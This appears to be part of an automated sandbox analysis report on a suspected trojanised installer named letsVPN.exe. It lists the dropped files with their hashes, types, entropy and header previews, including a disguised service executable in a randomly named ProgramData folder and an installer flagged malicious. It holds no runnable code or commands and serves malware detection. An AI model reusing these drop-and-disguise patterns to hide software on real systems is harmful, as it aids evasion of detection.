                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\s

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.551959555603401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:mVaymviYNqEZ3tt++3jyQoH0y23FbNKMipvFaSvAVrolBPZF+vIk7Am47NRkRm7l:HymviY7ZdM+3023FbNifZoGlBP3+IoAn
                                                                                                                                                                                                  MD5:66F67DA104FCAB66D963C47AEAD51677
                                                                                                                                                                                                  SHA1:5C20E591F057607EDABB939234073B7C1E1B0776
                                                                                                                                                                                                  SHA-256:6A3ADB6F15F0790EEAF07BDEBACDC8C3A7766B0CD0F9EAC0001338DA98C3DB18
                                                                                                                                                                                                  SHA-512:321E1E6F8FFE3EFA94BB3A41EF317F0525289DB1397D03FD68115F963AD74234A01459EC2143D9529B09D2C0414771B7E57715109CFF72EEF6049B97F70D3DE3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*!..y!..y!..y(.xy-..y(.hy...y!..y..yN.ey...yN.Qy...yN.PyS..yN.Ty#..yN.`y ..yN.ay ..yN.fy ..yRich!..y................PE..L.../.cg...........!................M.........................................&.......&...@.....................................T....0#..0...................p#..U......................................@............................................text...n........................... ..`.rdata..............................@..@.data...<x.... ....... .............@....rsrc....0...0#..2...j".............@..@.reloc..JD...p#..F....".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L....w.X.w.X.w.XN&_X.w.XN&`X.w.XN&]X.w.XN&aX.w.X...X.w.X...X.w.X.%`X.w.X.%]X.w.X.w.X.u.X.%aX.w.X.%[X.w.X.w.X.w.X.%^X.w.XRich.w.X................PE..L....D.V.........."..........$......W|............@.......................................@.................................Lf..................................D,..p................................4..@...............(....e..@....................text............................... ..`.rdata..............................@..@.data...0...........................@....rsrc...............................@..@.reloc..D,..........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.7263370043626358
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0D:9JZj5MiKNnNhoxuK
                                                                                                                                                                                                  MD5:BEA639A12A1ACE8280B8711C5D1674E1
                                                                                                                                                                                                  SHA1:14EE8E112285E4679BA4CBBE21A8181B110D2C75
                                                                                                                                                                                                  SHA-256:7C5ED079C306EC8D5023272F875E50318469B2FD33D5FE63FDFBBDC365BBD142
                                                                                                                                                                                                  SHA-512:73434C7352088B898DB18DD71C03F56C327E61DA0CAD197E743269CBE99F3F36AF36A09BF804B93B77D30EE83050AD8B08F71AA83F5718F7D16650DC9CB326F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0xad3dd8e6, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.7556167819364832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                                                                                                                                  MD5:FCCC047E06A99A3100A5337286C05F7F
                                                                                                                                                                                                  SHA1:B9CBE4227C0521E06E9CBA34FB1C79D6AFD10338
                                                                                                                                                                                                  SHA-256:4AC9F139328AC0E5238177AC63196945281512CD923B87F24E39599086D62A1C
                                                                                                                                                                                                  SHA-512:E42F079FBA57B1E7AF2AAA01BC364AD72F6E2A45813E44F348F2B528A304FB3EE17ADE5063BDF8369DA9A2DF9CF53B1A316D2EA63E42F97E943ED163BE76764F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.=..... .......7.......X\...;...{......................0.e......!...{?......|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................Gyo.....|....................".....|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                  Entropy (8bit):0.08008519067864
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:bll/KYeH+QcfNaAPaU1larQaalluxmO+l/SNxOf:bltKzH2NDPaUCr0gmOH
                                                                                                                                                                                                  MD5:C260CC4B5F31AC6CB28A7C81634D10B1
                                                                                                                                                                                                  SHA1:84A2E33DDA582B035452680075FCFD4637185698
                                                                                                                                                                                                  SHA-256:7BEB77F66A2FBB725DB1E0536A754C88FF69F0462A94B30B1DBB2016B5A207DD
                                                                                                                                                                                                  SHA-512:8EDC7D2B423A2A74CC76ABA928789464EB801FD5A5BA17F948AC29351CEB996051A8C2619FD25CEBFF58534C172F98EC83C7B62D37261FC3B2A7F82F4598F8AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.[q......................................;...{.......|...!...{?..........!...{?..!...{?..g...!...{?....................".....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\ckq

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15448957
                                                                                                                                                                                                  Entropy (8bit):7.999985585470918
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:BwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:WoWG0DDzWCgin/tB97Yx
                                                                                                                                                                                                  MD5:31F107A675EF31F01B6BD9A235A0312A
                                                                                                                                                                                                  SHA1:885CAB479BF5BB49BC8B756A4D9C4BC4C1617D49
                                                                                                                                                                                                  SHA-256:B9C959D49CCD893BEAA22987475A094D573D00C4A609E534B4D55E0B3D956DBD
                                                                                                                                                                                                  SHA-512:96D28B3D1284146032B1F55BA39AA4D92CD83CA440146CD9E7F564D0D804B72C9390D78894ACAC279324C918607C1F8CFDEEE58F3FF34A20A40447A55F63B01A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:PK...........Y..f\...........letsvpn-latest.exe..xT.7~.#.L2.$... (.h.....r...L.2...#.0.CB.s.[..'Q..Q..^...Bc...^./UZ.'.I.3|\..KP.g..Ac.$...L...}...<.......ge..g....Zk......wwp&....M.}....._.....OY....L.g({g.`U}....u..r.V.......s.....%......333...m....{.$.f..K/9v/{.}....V....;...Uk.T.....9...}5..H..p6C.!..(g...,.7~6.v@cb.6..HM.E'H*{p..<^;[XA*;.;....h...?...2.t....?..x.6...3..f.......W.B./.X.[W)Tr....g.B...j8g..9.....(...r..5... ....P....[K...M........._.r^:.Rj..i.[...b..p.]...y.....D.&Z5..|..E..<^e.,.........x%..8....sz.:.).....S&,kD].4..Km/{...+T.i...b...?{Q.?.....e{yq..E.jjS....XF5.u..."o7.Dv.Y...HFg..s......H|.Y..:"V-'.D41[;...A.m.H.4....6.``...A..Bi.......IO..ZH3.....>......v#..N....;..s..CnN5...._.I'.F.Y.....A;...w-......cc..,3Z....%....5..2.....[u..K.....f.L.b.......{KZ...1{..].P......!.}yli...[.{s.....i........~z.L .......P)..6.......w`.\jq.0$J..U......<.b#<.C.../AMz4.S...I.....B.~cx.;R....n.~...9h..N.Jj.sB..

                                                                                                                                                                                                  C:\ProgramData\letsvpn-latest.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15511576
                                                                                                                                                                                                  Entropy (8bit):7.998943488854436
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:opzmzGnkfV8tfGWcSWNKQ/kg/bZzvtMA63NiSAO:ohmSkOtfGWcSWJZzlAi+
                                                                                                                                                                                                  MD5:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  SHA1:567404FAEC3641F4DF889C2C92164CEE92723741
                                                                                                                                                                                                  SHA-256:EB11627E59757105BDDB884540854D56B173FE42417878DE4E7D246CAC92C932
                                                                                                                                                                                                  SHA-512:D5A4C4B343704B96C98183D13D90E37065C8BE0D0ED053696FB28B5E29F1432175D5E9F63C2D2879C3EB3541E4822A64AE7BFA2230C0C00B5C3ADA0A1AC82BED
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@..........................@......;.....@..........................................`.................. ............................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3046001, writer version 2, read version 2, file counter 7, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                  Entropy (8bit):0.6921140210664358
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Th49h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/rIr:IqIdjoOofwIdjogAIddJb2id
                                                                                                                                                                                                  MD5:4A639C6E907F0C38EED44EFBA636FCD8
                                                                                                                                                                                                  SHA1:3C72EB257AB1BEDBA25A0417142D7C50B6BE5BB7
                                                                                                                                                                                                  SHA-256:F35C01500A0A76E2D574301CA3371FF7D533A1C8B58591DD82B5ABBB64099FAC
                                                                                                                                                                                                  SHA-512:CEF84F292F0EFDA27EA723B1474B3C5AC1C60D4120C7B6FA7282BF44C459AB7F2C872298A1B2EDD694F409B402DEF9C3EDBEB3E811A4EA173D56DE9D399358B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................zq.....................E..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db-journal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                                  Entropy (8bit):3.777214372103078
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7M8qA9h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/9:79tqIdjoOofwIdjogAIddJb2idq
                                                                                                                                                                                                  MD5:D8498D38FC91360CD058612859F06A5C
                                                                                                                                                                                                  SHA1:3FF5EBF6172D25E4C36C9B0AA7E506132BF1A495
                                                                                                                                                                                                  SHA-256:F246664D162A8E6AAF8DFEA7996B4972F53F123CA8B8DBE65B3EF9CD1F4E87F8
                                                                                                                                                                                                  SHA-512:E87B361F12B16F42F3BC37C451FB33E4C448BDA2F08567C2DCADC50475FC6C4240EC4DFB9B51C4ADE4F35BC40B97AE652295308666389B5CC46A96925393A6A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.... .c............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................zq.....................E..........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db-shm

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                  Entropy (8bit):0.05277169061399585
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:GWARSfHRARSfHXP9Xml/Xml/wUUocBYr:mRSfHmRSfH1Sa4j
                                                                                                                                                                                                  MD5:3CBC83FF025FC00F5FA62DA8C24C49EC
                                                                                                                                                                                                  SHA1:87B108B937D2D0E86DBEC0A19D844507C4498485
                                                                                                                                                                                                  SHA-256:9C328AFB651A3B13ED7E0640A5618B7909C2D7FBC683520D952C7F6194328235
                                                                                                                                                                                                  SHA-512:D5692F7E3ACD59D4E6E36A09268DE555B83A7C9A01C06BBABDB2214B13E1D9ADB96ACF6C88AFB97FD7D80EE194454F0302CF0050CD4EA1416DF83F91949F0BCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:..-.......................l..%_W...R.A<..^.wd.....-.......................l..%_W...R.A<..^.wd...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db-wal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):82432
                                                                                                                                                                                                  Entropy (8bit):0.25395212676931506
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rvTtBv70uhyKSpwSUrwDJPNr8CWyU/5DUkrKRH59:WXZ
                                                                                                                                                                                                  MD5:DCF30BBB257B5E04E76337708C4AF545
                                                                                                                                                                                                  SHA1:200C778F236F8351F57CB12E500D39C94DC8B435
                                                                                                                                                                                                  SHA-256:3C189B79E6DDCCDE9E5376AE5FCED2332995AD77C6C5AD41EC84949589F0F5D9
                                                                                                                                                                                                  SHA-512:F02EF06FEA54546381B2063114C9F2148C5444C7FB1D12E85DDCC4C98F0F64501D30FA180C6621799A19050CCDB9BC9EB5D133DE39F82B4DC5F8C40254419CCB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:7....-.............R.A<.'......t...........R.A<.F[..m.^.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\LetsPRO.exe_Url_gwhy31c0ckt0g0pzcsdphrcj25fn5jbm\AppCenter.config (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.048749037023789
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqdDVEoFyPvWAGF9ULVuuQIMO:TMVBd1IGpOSAMBluqdJZnASG3QIT
                                                                                                                                                                                                  MD5:46334F032941DEA780C154F419B4D291
                                                                                                                                                                                                  SHA1:371D375CB0A1F1C732128B911C949B499DA276DF
                                                                                                                                                                                                  SHA-256:5F0EEDAB8A0DF8ED90EBBA202D74A9AAF8CBDB6BEBD2564A64F14388271BBB21
                                                                                                                                                                                                  SHA-512:BC20CA45990E13BFE9C6FD966CA0972FFB5047CEC1726662BDB1196DE166E6898BE7B5F5F8EF586C8578BAFE0217196C33D44269CBE04F7B1DD163849846C51B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="8f0adaa2-06ae-4649-a9f3-7ef3459ee383" />.. </appSettings>..</configuration>

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\LetsPRO.exe_Url_gwhy31c0ckt0g0pzcsdphrcj25fn5jbm\zwiouctu.newcfg

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):199
                                                                                                                                                                                                  Entropy (8bit):5.048749037023789
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vFWWMNHU8LdgCQcIMOofqRqLVuXKCWAa8LDMBlTqqdDVEoFyPvWAGF9ULVuuQIMO:TMVBd1IGpOSAMBluqdJZnASG3QIT
                                                                                                                                                                                                  MD5:46334F032941DEA780C154F419B4D291
                                                                                                                                                                                                  SHA1:371D375CB0A1F1C732128B911C949B499DA276DF
                                                                                                                                                                                                  SHA-256:5F0EEDAB8A0DF8ED90EBBA202D74A9AAF8CBDB6BEBD2564A64F14388271BBB21
                                                                                                                                                                                                  SHA-512:BC20CA45990E13BFE9C6FD966CA0972FFB5047CEC1726662BDB1196DE166E6898BE7B5F5F8EF586C8578BAFE0217196C33D44269CBE04F7B1DD163849846C51B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <appSettings>.. <add key="AppCenterInstallId" value="8f0adaa2-06ae-4649-a9f3-7ef3459ee383" />.. </appSettings>..</configuration>

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\AppCenter\8f0adaa2-06ae-4649-a9f3-7ef3459ee383\Logs.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3031001, file counter 7, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                  Entropy (8bit):2.0300234406717377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:KhKJxJjwCXep99Jo4xJGCXep9EbCXep9atVCXep9L:ayjwCO97pGCO9EbCO9uVCO9L
                                                                                                                                                                                                  MD5:EDD3621621D495DF574DF22F984F937F
                                                                                                                                                                                                  SHA1:E996EBA7E3A5BCEA4CB1557B75ECC8472F284F34
                                                                                                                                                                                                  SHA-256:1D7F13DE985C31981DC31118D34B0E9DE690F9E7F5762005427398ADC5E21CDD
                                                                                                                                                                                                  SHA-512:347E640D6937DA7FF8B13C16DA1614A6D80CC573E8811903935C0826EC8CDC7345DDD2D792532C0F42A8B1CE0CE918F60344B29628E48D6C085DCD6978BB5314
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................?.......*..|.*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\AppCenter\8f0adaa2-06ae-4649-a9f3-7ef3459ee383\Logs.db-journal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                  Entropy (8bit):2.6913396546243114
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:7eRJxJjwCXep9XJo4xJGCXep9TbCXep9atVCXep9+Qm:7erjwCO9ZpGCO9TbCO9uVCO9+f
                                                                                                                                                                                                  MD5:2D96B4DD54EC3FFDF21A3D6F6A71C369
                                                                                                                                                                                                  SHA1:F5C474B4FDBC1D8340DEAD91DAFF150A9278AE66
                                                                                                                                                                                                  SHA-256:2CF5C09E00138A378F61FE0567E9BFC3C62EEE86A88B10A5FF05D3986674A260
                                                                                                                                                                                                  SHA-512:A2A4373C12FC7456FF212C33EE26ABE5735FC864636D835568F51760D2BE5F32B7EC1D8FAB20741310A9977EB2639B1BFE3CA9DF77C62CC7AF2144E95B05282F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.... .c.....R..x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LetsPRO.exe.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2424
                                                                                                                                                                                                  Entropy (8bit):5.348163999675204
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MxHKlYHKh3ouHgJHreylEHMHKo/tHo6hAHKzeYHKU57UjHKtHKMRtHj:iqlYqh3ou0aymsqwtI6eqzVqU57Ujqtp
                                                                                                                                                                                                  MD5:1D015055F59E3C59A292A836E94902DB
                                                                                                                                                                                                  SHA1:6606627C577A8D9FBB362C0FFFD5E500295CA4AC
                                                                                                                                                                                                  SHA-256:D72DA6BAE429BF4A293DF3A8B637CC821491A9585DEA47553D6753A50D6EE519
                                                                                                                                                                                                  SHA-512:C2484FDCB22662B80659A9BD978CB1995D1C7912E6E24AABCF917862DB74F900B4775A24EE922B7A9B41CA48B5EF82C2E13C951D2CAD716B86FA11E1687C2EFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\4d760e3e4675c4a4c66b64205fb0d001\WindowsBase.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\17470ef0c7a174f38bdcadacc3e310ad\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):34383
                                                                                                                                                                                                  Entropy (8bit):5.053402703870376
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:QPV3IpNBQkj2Ph4iUxsfrRJv5FqvXhARlardFRgrOdBPtAHkDNZbNKeCMiYo6:QPV3CNBQkj2Ph4iUxsflJnqv6qdPgrOf
                                                                                                                                                                                                  MD5:D63CB5E171D7FCFE28C9E904F6855F08
                                                                                                                                                                                                  SHA1:8C6B004EC20FF61EF4CA9EAFA6F0254364A960AB
                                                                                                                                                                                                  SHA-256:F081E30CF5BB68206C7A59B83BC914B9BD2ED59FBEE26843075D2D0CD7393354
